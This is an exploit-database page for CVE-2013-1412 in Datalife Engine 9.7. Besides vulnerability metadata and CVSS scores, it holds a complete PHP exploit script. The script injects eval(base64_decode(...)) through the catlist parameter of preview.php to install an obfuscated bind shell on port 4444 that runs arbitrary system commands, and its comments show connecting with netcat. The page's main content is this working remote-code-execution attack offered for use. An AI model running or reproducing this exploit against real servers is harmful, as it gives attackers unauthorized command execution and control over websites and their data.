Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Datalife Engine 9.7 preview.php Bindshell
2015.12.15
Credit:
ssbostan
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2013-1412
CWE:
CWE-94
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
<?php // Exploit Title: Datalife Engine 9.7 Bindshell Exploit // Date: 13/12/2015 // Exploit Author: ssbostan // Vendor Homepage: http://dleviet.com/ // Version: == 9.7 // Tested on: Datalife Engine 9.7 // CVE: http://www.cvedetails.com/cve/CVE-2013-1412/ $target="http://localhost/dle97/engine/preview.php"; $shellcode="ICAgIAogICAgICBAc2V0X3RpbWVfbGltaXQoMCk7IEBpZ25vcmVfdXNlcl9hYm9ydCgxKTsgQGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7CiAgICAgICR2WXFXPUBpbmlfZ2V0KCdkaXNhYmxlX2Z1bmN0aW9ucycpOwogICAgICBpZighZW1wdHkoJHZZcVcpKXsKICAgICAgICAkdllxVz1wcmVnX3JlcGxhY2UoJy9bLCBdKy8nLCAnLCcsICR2WXFXKTsKICAgICAgICAkdllxVz1leHBsb2RlKCcsJywgJHZZcVcpOwogICAgICAgICR2WXFXPWFycmF5X21hcCgndHJpbScsICR2WXFXKTsKICAgICAgfWVsc2V7CiAgICAgICAgJHZZcVc9YXJyYXkoKTsKICAgICAgfQogICAgICAKICAgICRwb3J0PTQ0NDQ7CgogICAgJHNjbD0nc29ja2V0X2NyZWF0ZV9saXN0ZW4nOwogICAgaWYoaXNfY2FsbGFibGUoJHNjbCkmJiFpbl9hcnJheSgkc2NsLCR2WXFXKSl7CiAgICAgICRzb2NrPUAkc2NsKCRwb3J0KTsKICAgIH1lbHNlewogICAgICAkc29jaz1Ac29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApOwogICAgICAkcmV0PUBzb2NrZXRfYmluZCgkc29jaywwLCRwb3J0KTsKICAgICAgJHJldD1Ac29ja2V0X2xpc3Rlbigkc29jayw1KTsKICAgIH0KICAgICRtc2dzb2NrPUBzb2NrZXRfYWNjZXB0KCRzb2NrKTsKICAgIEBzb2NrZXRfY2xvc2UoJHNvY2spOwoKICAg.IHdoaWxlKEZBTFNFIT09QHNvY2tldF9zZWxlY3QoJHI9YXJyYXkoJG1zZ3NvY2spLCAkdz1OVUxMLCAkZT1OVUxMLCBOVUxMKSkKICAgIHsKICAgICAgJG8gPSAnJzsKICAgICAgJGM9QHNvY2tldF9yZWFkKCRtc2dzb2NrLDIwNDgsUEhQX05PUk1BTF9SRUFEKTsKICAgICAgaWYoRkFMU0U9PT0kYyl7YnJlYWs7fQogICAgICBpZihzdWJzdHIoJGMsMCwzKSA9PSAnY2QgJyl7CiAgICAgICAgY2hkaXIoc3Vic3RyKCRjLDMsLTEpKTsKICAgICAgfSBlbHNlIGlmIChzdWJzdHIoJGMsMCw0KSA9PSAncXVpdCcgfHwgc3Vic3RyKCRjLDAsNCkgPT0gJ2V4aXQnKSB7CiAgICAgICAgYnJlYWs7CiAgICAgIH1lbHNlewogICAgICAgIAogICAgICBpZiAoRkFMU0UgIT09IHN0cnBvcyhzdHJ0b2xvd2VyKFBIUF9PUyksICd3aW4nICkpIHsKICAgICAgICAkYz0kYy4iIDI.chr(43).JjFcbiI7CiAgICAgIH0KICAgICAgJHlSclI9J2lzX2NhbGxhYmxlJzsKICAgICAgJEhEUkQ9J2luX2FycmF5JzsKICAgICAgCiAgICAgIGlmKCR5UnJSKCdzaGVsbF9leGVjJylhbmQhJEhEUkQoJ3NoZWxsX2V4ZWMnLCR2WXFXKSl7CiAgICAgICAgJG89c2hlbGxfZXhlYygkYyk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCR5UnJSKCdzeXN0ZW0nKWFuZCEkSERSRCgnc3lzdGVtJywkdllxVykpewogICAgICAgIG9iX3N0YXJ0KCk7.CiAgICAgICAgc3lzdGVtKCRjKTsKICAgICAgICAkbz1vYl9nZXRfY29udGVudHMoKTsKICAgICAgICBvYl9lbmRfY2xlYW4oKTsKICAgICAgfWVsc2UKICAgICAgaWYoJHlSclIoJ3Byb2Nfb3BlbicpYW5kISRIRFJEKCdwcm9jX29wZW4nLCR2WXFXKSl7CiAgICAgICAgJGhhbmRsZT1wcm9jX29wZW4oJGMsYXJyYXkoYXJyYXkocGlwZSwncicpLGFycmF5KHBpcGUsJ3cnKSxhcnJheShwaXBlLCd3JykpLCRwaXBlcyk7CiAgICAgICAgJG89TlVMTDsKICAgICAgICB3aGlsZSghZmVvZigkcGlwZXNbMV0pKXsKICAgICAgICAgICRvLj1mcmVhZCgkcGlwZXNbMV0sMTAyNCk7CiAgICAgICAgfQogICAgICAgIEBwcm9jX2Nsb3NlKCRoYW5kbGUpOwogICAgICB9ZWxzZQogICAgICBpZigkeVJyUignZXhlYycpYW5kISRIRFJEKCdleGVjJywkdllxVykpewogICAgICAgICRvPWFycmF5KCk7CiAgICAgICAgZXhlYygkYywkbyk7CiAgICAgICAgJG89am9pbihjaHIoMTApLCRvKS5jaHIoMTApOwogICAgICB9ZWxzZQogICAgICBpZigkeVJyUigncGFzc3RocnUnKWFuZCEkSERSRCgncGFzc3RocnUnLCR2WXFXKSl7CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBwYXNzdGhydSgkYyk7CiAgICAgICAgJG89b2JfZ2V0X2NvbnRlbnRzKCk7CiAgICAgICAgb2JfZW5kX2NsZWFuKCk7CiAgICAgIH1.lbHNlCiAgICAgIGlmKCR5UnJSKCdwb3BlbicpYW5kISRIRFJEKCdwb3BlbicsJHZZcVcpKXsKICAgICAgICAkZnA9cG9wZW4oJGMsJ3InKTsKICAgICAgICAkbz1OVUxMOwogICAgICAgIGlmKGlzX3Jlc291cmNlKCRmcCkpewogICAgICAgICAgd2hpbGUoIWZlb2YoJGZwKSl7CiAgICAgICAgICAgICRvLj1mcmVhZCgkZnAsMTAyNCk7CiAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIEBwY2xvc2UoJGZwKTsKICAgICAgfWVsc2UKICAgICAgewogICAgICAgICRvPTA7CiAgICAgIH0KICAgIAogICAgICB9CiAgICAgIEBzb2NrZXRfd3JpdGUoJG1zZ3NvY2ssJG8sc3RybGVuKCRvKSk7CiAgICB9CiAgICBAc29ja2V0X2Nsb3NlKCRtc2dzb2NrKTsK"; $ch=curl_init(); curl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_POSTFIELDS, "catlist[0]=99999')||eval(base64_decode(\"$shellcode\"));//"); curl_setopt($ch, CURLOPT_URL, $target); curl_exec($ch); curl_close($ch); // php dle-97-preview-bindshell.php // nc localhost 4444 ?>
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top